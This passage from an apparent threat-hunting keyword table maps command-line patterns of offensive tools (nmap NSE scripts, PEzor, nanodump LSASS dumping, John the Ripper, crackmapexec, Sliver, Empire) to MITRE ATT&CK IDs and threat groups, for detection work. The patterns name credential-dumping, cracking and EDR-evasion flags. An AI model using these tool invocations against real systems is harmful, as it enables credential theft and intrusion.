Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* firewalk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* flash.bat*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -fluctuate=NA -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -fluctuate=RW -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --flush-attacks*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* follina.py *","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"* -force-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --force-kerb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --force-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* forgeTGT(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* --fork --write *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* --format exe * --jitter *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --format kirbi*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -format=bof *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=bof -cleanup *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=dotnet -sleep=*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=dotnet-pinvoke *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* --format=krb5asrep* --wordlist=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that 
automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --format=netntlmv2 *.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --format=NT -w=*_password.txt*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -format=reflective-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=service-dll *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -format=service-exe *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Freeze.rs/*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"* ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-libopie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* ftp-proftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* FtpSniffer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* ftp-syst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* FudgeC2 *","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* fuzz -u * 